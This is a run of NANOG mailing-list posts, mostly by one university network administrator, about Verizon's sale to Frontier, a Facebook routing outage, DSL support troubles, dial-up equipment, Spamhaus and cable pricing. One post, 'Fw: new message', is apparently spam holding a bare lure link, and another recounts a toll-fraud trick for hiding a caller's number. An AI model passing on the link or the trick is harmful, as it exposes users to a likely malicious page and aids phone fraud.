landline business to Frontier Communications. It was a very terse letter and as 
a customer I don't know if it affects me. While stating they aren't exiting the 
Wireless business, I want to know which parts are being sold off. Just the 
copper lines, POTS, DSL, FIOS (TV, Internet, phone)? Some clarity would be 
great.  I am a FIOS only customer. Can anyone recall if GTE was blocked from 
doing the same thing a few decades ago?

matthew black
california state university, long beach


RE: [BULK] Verizon exiting California

2015-08-03 Thread Matthew Black
I ran a few Google searches and came across a trove of complaints against 
Frontier. Seems they are far worse than GTE/Verizon. On the few occasions I 
have called for FIOS support, always reached someone knowledgeable and helpful. 
Not looking forward to the changeover, as the new owners have to pay off debts 
from their acquisition. That can only be accomplished through rate increases. I 
see a Verizon tech outside my kitchen window every two to three days as he 
replaces two nitrogen tanks keeping copper trunks pressurized against water 
intrusion.

matthew black
california state university, long beach


-Original Message-
From: NANOG [mailto:nanog-boun...@nanog.org] On Behalf Of Mike
Sent: Friday, July 31, 2015 7:33 AM
To: nanog@nanog.org
Subject: Re: [BULK] Verizon exiting California

On 07/31/2015 06:27 AM, Mike Hammett wrote:
> Can anyone else back that up (or refute it)?
>
>


I am a CLEC operating in California west, and I collocate with verizon. 
Yes, Verizon is proposing to sell its wireline assets to Frontier and 
become effectively an all-wireless carrier.


Frontier is going to get a patchwork of ancient switches and poorly 
maintained outside plant, in rural areas that would require tens of 
millions of dollars in upgrades for sparsely populated areas it could 
never turn a profit on. I seriously wonder about the viability of taking 
on the debt to get those areas and even just maintain them, vz itself 
has done a very poor job and it presently operates a network where E911 
routinely fails along with pots for many, for weeks at a time. And 
somehow, Verizon has been allowed to skate along without being held to 
the fire for its mandated utility / carrier of last resort obligations.

I worry that Frontier, with all the new added debt obligations, will not 
be able to swallow this pill.

Mike-



RE: [BULK] Verizon exiting California

2015-08-04 Thread Matthew Black
I don't live in a new suburban community with modern utilities. Well, the 50 
year-old water main on my street was replaced about 10 years ago. We haven't 
suffered major flooding like UCLA experienced last year. My house was built in 
1930. Much of that telco copper is pushing 70 years old or more. Some is above 
ground and some is underground. Until recently, the underground vault would 
flood whenever it rained. The b-box uses screw-type terminals, not even 66 or 
BIX. Thank you GTE.

matthew black
california state university, long beach


-Original Message-
From: Andrew Carey [mailto:ca...@ar-ballbat.org] 
Sent: Tuesday, August 04, 2015 10:02 AM
To: Matthew Black
Cc: nanog@nanog.org
Subject: Re: [BULK] Verizon exiting California


> On Aug 3, 2015, at 10:09, Matthew Black  wrote:
> 
> I ran a few Google searches and came across a trove of complaints against 
> Frontier. Seems they are far worse than GTE/Verizon. On the few occasions I 
> have called for FIOS support, always reached someone knowledgeable and 
> helpful. Not looking forward to the changeover, as the new owners have to pay 
> off debts from their acquisition. That can only be accomplished through rate 
> increases. I see a Verizon tech outside my kitchen window every two to three 
> days as he replaces two nitrogen tanks keeping copper trunks pressurized 
> against water intrusion.

Cutting expenses is another (well, and selling more too). Properly 
engineered/maintained cable should not require that level of constant 
attention. 


Verizon FIOS routing trouble to Facebook

2015-08-13 Thread Matthew Black
Anyone around from Verizon? Cannot reach Facebook through Verizon FIOS in Long 
Beach, CA. No trouble on the AT&T 4G LTE network.

Thursday, August 14, 2015 @ 0410 UTC

matthew black
california state university, long beach




RE: Verizon FIOS routing trouble to Facebook

2015-08-13 Thread Matthew Black
Pinging star.c10r.facebook.com [31.13.70.1] with 32 bytes of data:
Request timed out.
Request timed out.
Request timed out.
Request timed out.

As I said, it fails from FIOS in Long Beach CA.

On the phone with FIOS support now. The tech wants me to reset my router to 
factory defaults even after explaining I can reach everything else. I suggested 
they had an upstream routing or peering problem.



-Original Message-
From: christopher.mor...@gmail.com [mailto:christopher.mor...@gmail.com] On 
Behalf Of Christopher Morrow
Sent: Thursday, August 13, 2015 9:18 PM
To: Matthew Black
Cc: nanog@nanog.org
Subject: Re: Verizon FIOS routing trouble to Facebook

On Fri, Aug 14, 2015 at 12:12 AM, Matthew Black  wrote:
> Anyone around from Verizon? Cannot reach Facebook through Verizon FIOS in 
> Long Beach, CA. No trouble on the AT&T 4G LTE network.
>

$ p www.facebook.com
PING star.c10r.facebook.com (31.13.69.197) 56(84) bytes of data.
64 bytes from edge-star-shv-01-iad3.facebook.com (31.13.69.197): icmp_seq=1 ttl=89 time=12.1 ms
64 bytes from edge-star-shv-01-iad3.facebook.com (31.13.69.197): icmp_seq=2 ttl=89 time=5.64 ms

(looks like I'm talking to an east-coast fb instance)

...
 5  0.ae6.xl2.iad8.alter.net (140.222.228.57)  24.242 ms  24.707 ms *
 6  0.xe-11-0-1.gw9.iad8.alter.net (152.63.33.169)  22.515 ms 0.xe-11-1-0.gw9.iad8.alter.net (152.63.35.117)  15.337 ms 0.xe-10-3-0.gw9.iad8.alter.net (152.63.41.246)  10.154 ms
 7  fb-gw.customer.alter.net (204.148.11.102)  24.263 ms  11.457 ms  9.897 ms
 8  psw01a.iad3.tfbnw.net (204.15.23.162)  10.428 ms psw01b.iad3.tfbnw.net (204.15.23.154)  7.720 ms psw01c.iad3.tfbnw.net (204.15.23.144)  9.050 ms
...


RE: Ear protection

2015-09-23 Thread Matthew Black
I use the 3M E-A-R plugs at home and love them. Since my tragus doesn't fold 
over, I am unable to use traditional Apple earbuds or other things that just 
fall out of my ear. 3M E-A-R plugs are like memory foam and fit snugly, 
providing excellent noise reduction. I use ComplyFoam on in-ear headphones for 
the same reason, because those thin rubber ear bud covers are useless.

http://www.amazon.com/3M-E-A-R-Classic-earplugs-Pair/dp/B007GBUC7M

matthew black
california state university, long beach


-Original Message-
From: NANOG [mailto:nanog-boun...@nanog.org] On Behalf Of Nick Hilliard
Sent: Wednesday, September 23, 2015 2:34 AM
To: nanog@nanog.org
Subject: Ear protection

What are people using for ear protection for datacenters these days?  I'm
down to my last couple of corded 3M 1110:

http://www.shop3m.com/3m-corded-earplugs-hearing-conservation-1110.html

These work reasonably well in practice, with a rated nominal noise
reduction rate of 29dB.  Some people find them uncomfortable, but they work
well for me.

There are other ear plugs with rated NRR of up to 32-33dB.  Anyone have any
opinions on what brands work well for them?

Nick


RE: Facebook invisible in Italy

2015-09-28 Thread Matthew Black
Facebook has been running sluggish all day in California US for me.

matthew black
california state university, long beach

-Original Message-
From: NANOG [mailto:nanog-boun...@nanog.org] On Behalf Of Marco Paesani
Sent: Monday, September 28, 2015 1:35 PM
To: nanog
Subject: Facebook invisible in Italy

Hi,
some issues from FB network ??
Do you have some info ?
Regards,

-- 

Marco Paesani
MPAE Srl

Skype: mpaesani
Mobile: +39 348 6019349
Success depends on the right choice !
Email: ma...@paesani.it


RE: IP-Echelon Compliance

2015-10-09 Thread Matthew Black
If the IP addresses, hostnames, or domain names are not yours, why would you 
even bother responding? IANAL, I don't think it's your responsibility to direct 
them to the correct place.

Consider an auto-responder directing them to the DMCA page of your corporate 
website.

matthew black
california state university, long beach


-Original Message-
From: NANOG [mailto:nanog-boun...@nanog.org] On Behalf Of Baldur Norddahl
Sent: Friday, October 09, 2015 1:00 PM
To: nanog@nanog.org
Subject: IP-Echelon Compliance

Hi

I am sure all of you know of these guys. But what do you do when they keep
spamming your abuse address with reports for illegal downloads from
IP-addresses that are in no way related to our business?

I tried contacting them. And was told repeatedly that I had to update whois
information if I want the reports to be sent to another address. How I do
that for IP-ranges that are not mine is a good question. Besides the whois
information for said IP-ranges already have valid abuse information and it
is not our email address.

Do I just block them for spamming?

Regards,

Baldur


RE: IP-Echelon Compliance

2015-10-13 Thread Matthew Black
As a recipient of their stuff, it would be nice if IP Echelon even followed the 
information registered with the US Copyright Office for such notices. We paid 
$80 to let everyone know where notices should be sent.

matthew black
First Amendment: speaking for myself and not my employer!


-Original Message-
From: NANOG [mailto:nanog-boun...@nanog.org] On Behalf Of Seth Arnold
Sent: Monday, October 12, 2015 3:05 PM
To: nanog@nanog.org
Subject: RE: IP-Echelon Compliance

Hi All,

Please feel free to get in touch with us to request changes.

Expedited processing of your requests is offered through the Notice Recipient 
Management for ISPs section of our website located here:
http://www.ip-echelon.com/isp-notice-management/ 
<http://www.ip-echelon.com/isp-notice-management/>

If you are in the U.S., please also ensure that your change is reflected in the 
records of the US Copyright Office:  
http://copyright.gov/onlinesp/list/a_agents.html 
<http://copyright.gov/onlinesp/list/a_agents.html>


Cheers,
Seth


RE: Dial Up Solutions

2015-10-19 Thread Matthew Black
Livingston/Lucent PortMaster 3. 48 ports over 2 T1 interfaces and 10baseT all 
in 3 RU. Supports RADIUS. We dumped our last boxes many years ago; you can 
probably find some at portmasters.com.

Cheers.

matthew black
california state university, long beach

-Original Message-
From: NANOG [mailto:nanog-boun...@nanog.org] On Behalf Of Will Duquette
Sent: Friday, October 16, 2015 12:29 PM
To: nanog@nanog.org
Subject: Dial Up Solutions

Does anyone have any suggestions on equipment for our ISP that is still
supporting dial up customers?

At the moment we are running 3Com Total Control 1000's but are running out
of spare parts as we have failures.  Given that this gear is so old trying
to source spare parts is proving to be difficult.

We do have access to an Cisco AS5200 but are looking for maybe a SIP based
solution that could possibly run on our VM farm?  Has anyone heard of
anything like that or does it even exist?

What kind of gear are you running if you still are supporting dial up
customers?

Thanks in advance

-- 
Will Duquette
GWI
Network Systems Engineer
www.gwi.net


Fw: new message

2015-10-26 Thread Matthew Black
Hey!

 

New message, please read <http://acresnacres.ca/however.php?7r>

 

Matthew Black



RE: ICYMI: FBI looking into LA fiber cuts, Super Bowl

2016-01-20 Thread Matthew Black
Enclosed stadiums won't have to worry about remote drones until they get smart 
enough to open doors on their own. Not sure why the NFL gets uptight about 
unauthorized recording. Most sporting events have little value once the event 
is over.

matthew black


-Original Message-
From: NANOG [mailto:nanog-boun...@nanog.org] On Behalf Of Paul Ferguson
Sent: Tuesday, January 19, 2016 4:42 PM
To: nanog@nanog.org
Subject: Re: ICYMI: FBI looking into LA fiber cuts, Super Bowl


While I agree that the broadcast networks are concerned about
unauthorized recording and/or rebroadcasting of the event, there's
also a precedent on a drone crashing during a high-profile sporting
event in the U.S.:

http://www.cnn.com/2015/09/04/us/us-open-tennis-drone-arrest/index.html

$.02,

- - ferg


RE: phone fun, was GeoIP database issues and the real world consequences

2016-04-27 Thread Matthew Black
One toll defeat trick that worked in GTE land in Southern California was to 
call the operator, then silently wait for them to hang up. Rattle the receiver 
hook several times for them to come back on the line and they would not know 
the caller's telephone number.



-Original Message-
From: NANOG [mailto:nanog-bounces+matthew.black=csulb@nanog.org] On Behalf 
Of Larry Sheldon
Sent: Tuesday, April 26, 2016 12:11 PM
To: nanog@nanog.org
Subject: Re: phone fun, was GeoIP database issues and the real world 
consequences



On 4/20/2016 10:15, Owen DeLong wrote:
>
>> On Apr 20, 2016, at 7:59 AM, Jean-Francois Mezei 
>>  wrote:
>>
>> On 2016-04-20 10:52, Owen DeLong wrote:
>>
>>> For the most part, “long distance” calls within the US are a thing of the
>>> past and at least one mobile carrier now treats US/CA/MX as a single
>>> local calling area
>>
>>
>> Is this a case of telcos having switched to IP trunks and can reach
>> other carriers for "free"
>>
>> Or are wholesale long distance still billed between carriers but at
>> prices so low that they can afford to offer "free" long distance at
>> retail level ?
>
> I think it boiled down to a recognition that the costs of billing were 
> beginning to account for something like $0.99 of every $1 billed.

I wonder if the costs of avoiding-preventing-investigating toll fraud 
finally grow to consume the profit in the product.

I know that long ago there were things that I thought were insanely 
silly.  A few examples:

As an ordinary citizen I was amused and annoyed, in the case where a 
toll charge had been contested (and perforce refunded) there would often 
be several non-revenue calls to the protesting number asking whoever 
answered if they knew anybody in the called city, or if they knew who 
the called number belonged to.   (Proper answer in any case:  Who or 
what I know is none of your business.)  Often there would calls to the 
called number (super irritating because the error was in the 
recording--later learned to be poor handwriting) asking the reciprocal 
questions except that often they had no idea that a call had been made.

I was a Toll Transmissionman for a number of years back in the last 
ice age and one of the onerous tasks the supervisor had was "verifying 
the phone bill" which might be a stack as much as six inches tall.  The 
evening shift supervisor (or one of them in a large office, like Los 
Angeles 1 Telegraph, where I worked for a while) would go through the 
bill, line by line, page by page, looking at the called number and if 
he recognized it and placing a check mark next to it.  If he did not 
recognize it, he would search the many lists in the office to see if it was 
shown, and adding a check mark if a list showed it for a likely sounding 
legal call.  If that didn't work he would probably have to call the 
number to see who answered (adding a wasted revenue-call path to the 
wreckage).  Most often it would turn out to be the home telephone number 
of a repair supervisor in West Sweatsock, Montana, who had been called 
because a somebody who protested the policy that the repairman going 
fishing meant some problem would not be addressed for several days.  So 
he put a check mark next to the number and moved on.

Which meant the number would show up on the next month's bill.  And it 
would again not be recognized from memory.  And so forth and so on. 
Until eventually, after several months, the number would be recognized, 
check-marked without drama, and disappear forever from the bill.

Lastly, in later years I was assigned to the Revenue Accounting 
organization (to write programs for printing telephone books) and came 
to realize that there were a LOT of people in RA working with a LOT of 
people in the Chief Special Agents organization using a LOT of computer 
time to analyze Toll records for fraud patterns.

Oops, not quite lastly.  Looking back at my Toll Plant days in the 
heyday of Captain Crunch--there were a lot of engineering hours redesigning 
Toll equipment, and plant hours modifying or replacing equipment to 
defeat the engineering efforts of the Blue Box Boys.

-- 
"Everybody is a genius.  But if you judge a fish by
its ability to climb a tree, it will live its whole
life believing that it is stupid."

--Albert Einstein


RE: Broadcast television in an IP world

2017-11-20 Thread Matthew Black
Right now only 25% of cable subscribers watch sports channels like ESPN. But 
100% pay up to $20 a month for ESPN et al. in their monthly subscription fees. 
HBO and Showtime subscribers pay for those premium services. It is well past 
time for sports enthusiasts to pay for their very expensive content in a sports 
premium package.


-Original Message-
From: NANOG [mailto:nanog-boun...@nanog.org] On Behalf Of Luke Guillory
Sent: Friday, November 17, 2017 3:02 PM
To: Jean-Francois Mezei; nanog@nanog.org
Subject: RE: Broadcast television in an IP world

This used to be the case.

While it might lower OPX that surely won't result in lower retrans, will just 
be more profit for them.

We're down as well on video subs, this is 99% due to rising prices.

This is where it's heading for sure, in the end it will cost more as well since 
each will be charging more than the per sub rates we're getting charged. They'll 
have to in order to keep revenue the same.

When ESPN offers an OTT product I have no doubt it will be near the $20 per 
month, for 5 channels or so?



Luke Guillory
Vice President – Technology and Innovation

Tel:985.536.1212
Fax:985.536.0300
Email:  lguill...@reservetele.com

Reserve Telecommunications
100 RTC Dr
Reserve, LA 70084

_

Disclaimer:
The information transmitted, including attachments, is intended only for the 
person(s) or entity to which it is addressed and may contain confidential 
and/or privileged material which should not disseminate, distribute or be 
copied. Please notify Luke Guillory immediately by e-mail if you have received 
this e-mail by mistake and delete this e-mail from your system. E-mail 
transmission cannot be guaranteed to be secure or error-free as information 
could be intercepted, corrupted, lost, destroyed, arrive late or incomplete, or 
contain viruses. Luke Guillory therefore does not accept liability for any 
errors or omissions in the contents of this message, which arise as a result of 
e-mail transmission. .



RE: Broadcast television in an IP world

2017-11-20 Thread Matthew Black
I wrote ET AL. ESPN costs $9 per month. Throw in Fox Sports and other regional 
sports franchise fees to get $20 a month. And then ESPN double dips by airing 
advertising. HBO and Showtime are commercial free.

http://www.businessinsider.com/cable-satellite-tv-sub-fees-espn-networks-2017-3



-Original Message-
From: Luke Guillory [mailto:lguill...@reservetele.com] 
Sent: Monday, November 20, 2017 8:10 AM
To: Matthew Black; nanog@nanog.org
Subject: RE: Broadcast television in an IP world

ESPN's programing fees aren't anywhere near $20 a month, they're not even $10 a 
month. HBO on the other hand is pretty much what the end user pays in terms of 
programing cost. 






RE: Broadcast television in an IP world

2017-11-20 Thread Matthew Black
No problem, and thanks for the apology. Cable TV bills get most of us heated. 
100% a la carte pricing may not be the solution, but the current model is pretty 
cruel to subscribers who aren't sports fans. It's likely that a premium sports 
package may have to charge upwards of $50-100 per month since they can no 
longer charge everyone. ESPN subscriber fees have skyrocketed because they can 
get away with charging more, just like HBO. The cable TV industry should be 
much more transparent about costs.


-Original Message-
From: Luke Guillory [mailto:lguill...@reservetele.com] 
Sent: Monday, November 20, 2017 8:40 AM
To: Matthew Black; nanog@nanog.org
Subject: RE: Broadcast television in an IP world

I missed the et al, sorry about that. 






Facebook Issues/Outage ... what about Yahoo! Answers

2010-09-24 Thread Matthew Black
I didn't have trouble with Facebook, but the last two evenings Yahoo! 
Answers [http://answers.yahoo.com] seems 99.47% unresponsive. Verizon DSL 
customer.



matthew black
e-mail postmaster
california state university, long beach



Re: Mastercard problems

2010-12-08 Thread Matthew Black

- Original Message -
From: James Downs
To: andrew.wallace
Cc: Christopher Morrow; "nanog@nanog.org"
Sent: Wednesday, 8 December 2010, 21:30:20
Subject: Re: Mastercard problems

[snip]
Yikes.. you consider a private company's business to be the financial and 
payment system of the United States?



Yes, I do. Especially when government agencies accept payments through 
MasterCard, et al.



matthew black
comments reflect my opinions and may not represent those of my employer.



Re: Wacky Weekend: NERC to relax power grid frequency strictures

2011-06-27 Thread Matthew Black

On Fri, 24 Jun 2011 18:29:14 -0400
 Jay Ashworth  wrote:

The North American Electric Reliability Council is planning to relax
the standards for how closely power utilities must hold to 60.00Hz.

Here's my absolute favorite quote of all time:

 Tweaking the power grid's frequency is expensive and takes a lot of effort,
 said Joe McClelland, head of electric reliability for the Federal Energy
 Regulatory Commission.



I blinked too after hearing of this. They say it's an economic issue because 
it costs millions of dollars to maintain a steady frequency. Excuse me...we 
probably spend over $50 billion per year on electricity and they're 
complaining about a few million. Talk about pinching pennies!


matthew black
e-mail postmaster
california state university, long beach



Re: 3Com Total Control documentation

2011-07-28 Thread Matthew Black
My sympathies to your unfortunate situation. The last tech probably doesn't 
want to be bothered...that's a management issue. A PortMaster 3 may solve 
your problems.


I looked at 3Com Total Control about 15 years ago but know nothing about it. 
We employed US Robotics rack-mount chassis paired with Xyplex terminal 
servers. That was replaced with the Livingston PortMaster 3 (later bought by 
Lucent). Each PortMaster 3 connects to two T1 lines and a 10BaseT Ethernet, 
supporting 48 users. Use RADIUS authentication and you're all set.


You can probably pick up some of those for a hundred dollars.

You will need to learn about T1 phone lines and RADIUS.

Best regards,

matthew black
california state university, long beach


On Tue, 26 Jul 2011 19:35:35 -0700
 Hector Herrera  wrote:

Hi,

I have "inherited" several 3Com Total Control racks that are used to
provide dial-up service to rural areas.

The racks have been running in auto-pilot for several years now and
the last tech's comments with regard to the racks was along the lines
of "I don't know".

I would like to regain control over the network as recently the
outages are becoming more frequent and extended and we don't usually
know about it until customers call the support line a week later.

Decommissioning the racks is not currently an option as there are no
other reasonable alternatives for internet service (other than
satellite).  The ISP being a marginal area provider is also short in
funds.

I'm having a hard time finding documentation, firmware updates or
support for these racks.

As far as I can tell, the current owner of the product line is
UTStarCom in China, but their website does not make any reference to
the product.

I also found a company that sells the equipment and provides support
contracts, WRCA, but their pricing is out of the budget range for the
ISP.

I am hoping that some of you who used to work with this equipment may
still have documentation CDs or firmware updates stored away
somewhere.

I'm looking for any documentation, firmware updates and some help
figuring out which NAC goes with which NIC.

Or perhaps you can suggest other companies that provide support for
the equipment at more reasonable rates.

I would be willing to set up a public repository to help other admins.

Thanks,

--
Hector Herrera







Re: 3Com Total Control documentation

2011-07-28 Thread Matthew Black
By the way, a simple Google search of "3Com Total Control" yields this as 
the first result:


http://www.brianpinon.com/brian/assets/PDFs/3Com/ARCGSG.pdf

matthew






Re: Spamhaus...

2010-02-17 Thread Matthew Black

On Wed, 17 Feb 2010 17:32:51 -0500
 "Laczo, Louis"  wrote:

Folks,

I'm looking for comments / suggestions / opinions from any providers that 
have been contacted by spamhaus about excessive queries originating from 
their DNS resolvers, typically, as a proxy for customers. I know that 
certain large DNS providers (i.e. google and level3) have either been 
banned or have voluntarily blocked spamhaus queries by their resolvers. 
We're currently in discussion with spamhaus and I wanted to see how others 
may have handled this.


Thanks!
--Lou



When we licensed Spamhaus a few years back, they required us to set up a DNS 
slave server instead of querying against their public server. They had a 
special DNS client that allowed partial zone updates. Turns out we 
downloaded huge hourly updates.


We no longer use Spamhaus, relying instead upon Sender Base Reputation 
Scores (IronPort).


matthew black
e-mail postmaster
california state university, long beach



Re: Spamhaus ...

2010-02-18 Thread Matthew Black

On Wed, 17 Feb 2010 18:33:00 -0700
 Joel M Snyder  wrote:
I second the assertion that others have already made that this is worth 
the money.  We do spam testing, and I can more-or-less guarantee that 
Spamhaus beats all of the free reputation services (and a number of the 
for-pay ones) hands-down in its ability to block spam and the incredibly 
low number of false positives.


We ADDED Spamhaus to our IronPort because it was inexpensive. I recall using 
MAPS RBL many years earlier with a lot of false positives and angry 
companies trying to reach our users.


 

John Levine wrote:

> > We no longer use Spamhaus, relying instead upon Sender Base Reputation
> > Scores (IronPort).

> How does the price compare?

Well, depending on how you look at it, either horribly or beautifully. You 
can't buy SenderBase by itself; you get it with an Ironport anti-spam 
appliance.  So if you were going to buy Ironport anyway, the price is 
"free" which makes it cheaper than Spamhaus.  On the other hand, if you 
just want SenderBase, it'd be a very expensive way to get only the 
reputation filtering.


In general, like many of the big-name anti-spam products, the reputation 
service is part-and-parcel of the product and can't really be separated 
out.  In fact, with Ironport, they use the reputation service in two ways: 
one is to block connections in the first place, and the second way is to 
bias results of their content filter for connections which are accepted. 
Since their scores are -10 to +10, there's considerable leeway to use the 
information as part of their anti-spam cocktail beyond simple "go/no-go" of 
a typical reputation service.


jms
Joel M Snyder, 1404 East Lind Road, Tucson, AZ, 85719



SenderBase blocks about 90% of incoming connections. 3-part TCP/IP 
handshake, send them an error, then disconnect. For some egregious senders, 
we simply refuse the TCP/IP connection. You don't have to scan refused 
messages or connections for viruses or spam, a very costly process.


When IronPort first released their own anti-spam product to replace 
Brightmail, it had many false positives. We were a beta tester. They do much 
better now and false positives are almost non-existent.


We still encounter the occasional user wondering why their connection gets 
blocked by SenderBase. For our users, we remind them to configure SMTP AUTH 
when working from off campus because so many DSL addresses have low SBRS 
values. SMTP AUTH lets them bypass the SenderBase.


One of the coolest IronPort features is virtual gateways. Besides all the 
reputation filtering and anti-spam, anti-virus features, IronPort lets you 
create virtual gateways so outbound e-mail can be classed to use a different 
outbound source IP address. Very helpful so that our bulk mailers don't 
affect individual users should we get black or graylisted.


Cheers.

matthew black
e-mail postmaster
california state university, long beach



Possible outage in Camarillo, CA USA

2009-07-06 Thread Matthew Black
A colleague reports that Verizon and ATT have a cut cable in Camarillo, CA, 
in the vicinity of Lewis Road and Dawson. Anyone have more information on 
this outage? Thanks.


matthew black
e-mail postmaster
california state university, long beach



Re: Does Internet Speed Vary by Season?

2009-10-07 Thread Matthew Black

On Wed, 7 Oct 2009 23:12:44 +0800
 Adrian Chadd  wrote:

Please don't forget moisture content. DSL speeds may drop during
wet winters because cable pits fill with water. :)

Those with real statistics, please stand up. I know ISPs who run
large DSL infrastructures have these stats. I've even seen them
at conferences. :)


Adrian



Me! During the rainy season of recent past years, the cable vault in front 
of my home would flood, thereby degrading or completely hosing DSL service. 
Haven't had heavy rains for a couple years so no trouble.


I had to replace my DSL modem about 6 months ago because the previous 
Westell Wirespeed modem had died very slowly. My speed went from 1.5M to 
less than 200k and was flaky. The new modem gives me a clean 3M/768k 
connection. Not bad for DSL ($35/month). But that wasn't weather related. 
Verizon.


matthew black
california state university, long beach



Advice requested

2007-05-29 Thread Matthew Black


What would you do if a major US computer security firm
attempted to hack your site's servers and networks?
Would you tell the company or let their experts figure
it out?

matthew black
network services
california state university, long beach


[Nanog] NANOG list changes

2008-04-18 Thread Matthew Black
OK, looks like they changed servers recently. I haven't
been following the list for a few months. They also
changed the message headers and they no longer include
the Sender: header that my filter uses on incoming e-mail.

Sender: [EMAIL PROTECTED]

matthew black
network services
california state university, long beach
1250 bellflower boulevard
long beach, ca 90840-0101



On Fri, 18 Apr 2008 12:00:02 +
  [EMAIL PROTECTED] wrote:
> Welcome to the NANOG@nanog.org mailing list!
> 
> To post to this list, send your email to:
> 
>  nanog@nanog.org
> 
> General information about the mailing list is at:
[...snip]

___
NANOG mailing list
NANOG@nanog.org
http://mailman.nanog.org/mailman/listinfo/nanog


Re: Fake-alert: VERIFY YOUR MERIT.EDU WEBMAIL ACCOUNT

2008-05-27 Thread Matthew Black

On Sat, 24 May 2008 17:14:33 +0100
 Graeme Fowler <[EMAIL PROTECTED]> wrote:

On Sat, 2008-05-24 at 17:02 +0200, Peter Dambier wrote:

I don't trust it:


Quite right too, it's a spear-phishing attack. This is currently an
almost daily occurrence for .edu domains.

The compromised accounts are frequently abused via webmail systems,
being used to send out more scams.

The scammers responsible are also targeting UK higher ed institutions,
with a limited degree of success. I can't really speak for my US
counterparts with regards the success of the attacks, but one would
surmise that it's more or less the same. To paraphrase badly:

All users are gullible, but some are more gullible than others.

-g



As a US EDU, I can attest to the fact that a handful of
our webmail accounts have been compromised and subsequently
used to send out these types of phishing attacks. We never
figured out how the accounts were compromised. I suspect
users with hand-held devices are being snooped when they
use IMAP. Our webmail is SSL, but not IMAP.

Most of the spammers' messages appear as though someone
is manually using their cut & paste to generate the spam,
not anything automated (based on the rate messages go out).
Seems rather tedious.


matthew black
e-mail postmaster
network services
california state university, long beach





Re: Spamhaus down?

2008-06-13 Thread Matthew Black

On Fri, 13 Jun 2008 08:02:58 +
 Steve Linford <[EMAIL PROTECTED]> wrote:

On 12 Jun 2008, at 20:55, Raymond L. Corbin wrote:


Something going on with SpamHaus site/ dnsbl servers?



We get a spamhaus data feed of PBL, SBL, and XBL
and have not seen any problems recently.

matthew black
california state university, long beach



Re: Cache Poisoning Detection via ONZRA's CacheAudit

2008-08-01 Thread Matthew Black

On Fri, 1 Aug 2008 13:20:45 -0700
 Jose Avila <[EMAIL PROTECTED]> wrote:
In light of new attack vectors DNS Cache Poisoning discovered by Dan 
Kaminsky, ONZRA has developed a free Open Source (BSD License) tool 
called CacheAudit. This tool allows recursive providers to detect cache 
poisoning events using cache dumps from their DNS servers. Along with 
releasing this tool, ONZRA has also released a white paper describing the 
validation process.


Main Tool Page: http://www.onzra.com/cacheaudit.html
White Paper: http://www.onzra.com/RecursiveDNSCacheAuditingWhitepaper.pdf





Main Tool Page: http://www.onzra.com/cacheaudit.html


LOL. Now that's funny! I get a completely black screen
with Firefox and IE. I briefly glanced at the HTML src
code (CTRL-U) but don't want to burn brain cells figuring
out what you have to say.

matthew black
network services
california state university, long beach



Re: [funsec] McColo: Major Source of Online Scams and Spams Knocked Offline (fwd)

2008-11-14 Thread Matthew Black

Since McColo, et al., cutting off those miscreant customers
on Wednesday, I've noticed a huge decline in connection
attempts to our e-mail gateways. Even if their efforts are
temporary, the change is quite noticeable.

matthew black
e-mail postmaster
california state university, long beach



Re: No route to verizon

2008-12-15 Thread Matthew Black

On Mon, 15 Dec 2008 15:05:44 -0400
 "Sharlon R. Carty"  wrote:

Hello,

This is my first post. 


Can anyone provide some info or Verizon why there is no connectivity to
Verizon CA(Verizon Business UUNETCA8-A)? 
Can not reach the following net range: 66.48.66.160 - 66.48.66.175


My traceroute also ends with ALTER.NET:
traceroute to 66.48.66.160 (66.48.66.160), 30 hops max, 40 byte packets
...
 7  los-edge-01.inet.qwest.net (63.147.28.181)  1.701 ms  1.870 ms  1.734 ms
 8  los-core-01.inet.qwest.net (205.171.32.33)  1.755 ms  1.670 ms  1.823 ms
 9  lap-brdr-01.inet.qwest.net (205.171.32.10)  1.722 ms  2.082 ms  2.676 ms
10  0.so-4-3-0.BR1.LAX7.ALTER.NET (204.255.169.193)  2.094 ms  2.046 ms  1.720 ms



matthew black
e-mail postmaster
california state university, long beach



What to do when your ISP off-shores tech support

2008-12-24 Thread Matthew Black

I've had difficulties reaching anyone with a brain
at my DSL provider Verizon California.

I can reliably ping the first hop from my home to
the CO with a 25ms delay. But if I ping any other
location, packets get dropped or significantly
delayed. To me, this sounds like Verizon has an
internal routing problem rather than a problem
with my phone line. Note that it rained recently
in our area and the cable vault in front of my
home is usually covered with stagnant water because
the gutters don't drain it away.

I have tried to explain this to tech support but
they refuse to go off script, even the supervisors.
They keep insisting on sending a tech to my home
when I suggest this should be escalated to their
network operations team.

Anyhow, if I can reliably ping the first hop
from my home, would that eliminate my telephone
connection as part of the problem? Just a sanity
check on my part. Thanks.

matthew black
california state university, long beach



Re: What to do when your ISP off-shores tech support

2008-12-24 Thread Matthew Black

On Wed, 24 Dec 2008 09:51:41 -0800
 "Tomas L. Byrnes"  wrote:

Cox Communications has fully on-shore support. Here in SD they are
actually LOCAL.

Their TS staff are responsive and courteous. I only wish their network
were more reliable. (They're better than SBC in my experience, however.)



In Verizon land, residential customers do not have
CLEC voice or DSL alternatives. We do not have Cox.
Our area is served by Charter Communications who has
the broadband cable monopoly. Verizon has the fiber
monopoly with their FIOS. AT&T fiber is not possible
in Verizon land. Nobody competes against Verizon for
residential service in Southern California. However,
Charter cable customers can get dial tone and data
services.

matthew black
e-mail postmaster

bargaining unit 9 representative
csueu chapter 315

network services BH-188
california state university, long beach
1250 bellflower boulevard
long beach, ca  90840-0101

work phone: 562-985-5144



Re: What to do when your ISP off-shores tech support

2008-12-24 Thread Matthew Black

On Wed, 24 Dec 2008 10:10:33 -0800
 Etaoin Shrdlu  wrote:

Matthew Black wrote:


On Wed, 24 Dec 2008 09:51:41 -0800
 "Tomas L. Byrnes"  wrote:


Cox Communications has fully on-shore support. Here in SD they are
actually LOCAL.



In Verizon land, residential customers do not have
CLEC voice or DSL alternatives. We do not have Cox.
Our area is served by Charter Communications who has
the broadband cable monopoly. Verizon has the fiber
monopoly with their FIOS. AT&T fiber is not possible
in Verizon land. Nobody competes against Verizon for
residential service in Southern California.


Sir, both COVAD and DSLExtreme beg to differ. Seriously. I just checked.

--
The histories of mankind are histories only of the higher classes.

Thomas Malthus



Going through COVAD's interactive DSL chooser,
there are no options for RESIDENTIAL service.

<http://covad.com/web/index.html>


DSLextreme is charging a higher price than Verizon
and I suspect they are simply reselling Verizon's
DSL rather than connecting my copper to their
network. That's hardly what I consider CLEC service.
I could be wrong and would switch if I could. But I
don't see them offering voice and that's why I conclude
they are reselling Verizon's DSL service.

matthew black
california state university, long beach



Re: What to do when your ISP off-shores tech support

